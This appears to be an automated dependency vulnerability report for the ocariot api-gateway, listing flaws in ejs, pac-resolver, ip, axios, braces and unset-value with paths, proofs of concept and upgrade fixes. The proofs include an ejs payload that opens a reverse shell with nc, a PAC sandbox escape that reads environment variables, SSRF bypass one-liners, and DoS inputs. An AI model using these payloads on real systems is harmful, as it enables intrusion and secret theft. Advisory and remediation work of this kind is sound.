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high severity
- Vulnerable module: ejs
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › ejs@2.7.4
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options parameter of renderFile, which makes it possible to inject code into outputFunctionName.
Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.
PoC:
Creation of reverse shell:
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
Remediation
Upgrade ejs to version 3.1.7 or higher.
References
high severity
- Vulnerable module: pac-resolver
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › proxy-agent@4.0.1 › pac-proxy-agent@4.1.0 › pac-resolver@4.2.0
Overview
Affected versions of this package are vulnerable to Remote Code Execution (RCE). This can occur when used with untrusted input, due to unsafe PAC file handling.
In order to exploit this vulnerability in practice, this either requires an attacker on your local network, a specific vulnerable configuration, or some second vulnerability that allows an attacker to set your config values.
NOTE: The fix for this vulnerability is applied in the node-degenerator library, a dependency is written by the same maintainer.
PoC
const pac = require('pac-resolver');
// Should keep running forever (if not vulnerable):
setInterval(() => {
console.log("Still running");
}, 1000);
// Parsing a malicious PAC file unexpectedly executes unsandboxed code:
pac(`
// Real PAC config:
function FindProxyForURL(url, host) {
return "DIRECT";
}
// But also run arbitrary code:
var f = this.constructor.constructor(\`
// Running outside the sandbox:
console.log('Read env vars:', process.env);
console.log('!!! PAC file is running arbitrary code !!!');
console.log('Can read & could exfiltrate env vars ^');
console.log('Can kill parsing process, like so:');
process.exit(100); // Kill the vulnerable process
// etc etc
\`);
f();
Remediation
Upgrade pac-resolver to version 5.0.0 or higher.
References
high severity
- Vulnerable module: ip
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › proxy-agent@4.0.1 › pac-proxy-agent@4.1.0 › pac-resolver@4.2.0 › ip@1.1.9
Overview
ip is a Node library.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the ip.isPublic() and ip.isPrivate() functions. An attacker can interact with internal network resources by supplying specially crafted IP address such as octal localhost format ("017700000001") that is incorrectly identified as public.
Note:
This issue exists because of an incomplete fix for CVE-2024-29415.
PoC
Test octal localhost bypass:
node -e "const ip=require('ip'); console.log('017700000001 bypass:', ip.isPublic('017700000001'));" - returns true
Remediation
There is no fixed version for ip.
References
high severity
- Vulnerable module: ip
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › proxy-agent@4.0.1 › pac-proxy-agent@4.1.0 › pac-resolver@4.2.0 › ip@1.1.9
Overview
ip is a Node library.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) via the ip.isPublic() and ip.isPrivate() functions. An attacker can interact with internal network resources by supplying specially crafted IP address such as null route ("0") that is being incorrectly identified as public.
Note: This issue exists because of an incomplete fix for CVE-2024-29415.
Exploit is only possible if the application and operating system interpret connection attempts to 0 or 0.0.0.0 as connections to 127.0.0.1.
PoC
Test null route bypass:
node -e "const ip=require('ip'); console.log('0 bypass:', ip.isPublic('0'));" - returns true
Remediation
There is no fixed version for ip.
References
high severity
- Vulnerable module: axios
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › axios@0.20.0
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the trim function.
PoC
// poc.js
var {trim} = require("axios/lib/utils");
function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}
var time = Date.now();
trim(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade axios to version 0.21.3 or higher.
References
high severity
- Vulnerable module: braces
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2
Overview
braces is a Bash-like brace expansion, implemented in JavaScript.
Affected versions of this package are vulnerable to Excessive Platform Resource Consumption within a Loop due improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.
PoC
const { braces } = require('micromatch');
console.log("Executing payloads...");
const maxRepeats = 10;
for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
const payload = '{'.repeat(repeats*90000);
console.log(`Testing with ${repeats} repeats...`);
const startTime = Date.now();
braces(payload);
const endTime = Date.now();
const executionTime = endTime - startTime;
console.log(`Regex executed in ${executionTime / 1000}s.\n`);
}
Remediation
Upgrade braces to version 3.0.3 or higher.
References
high severity
- Vulnerable module: unset-value
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
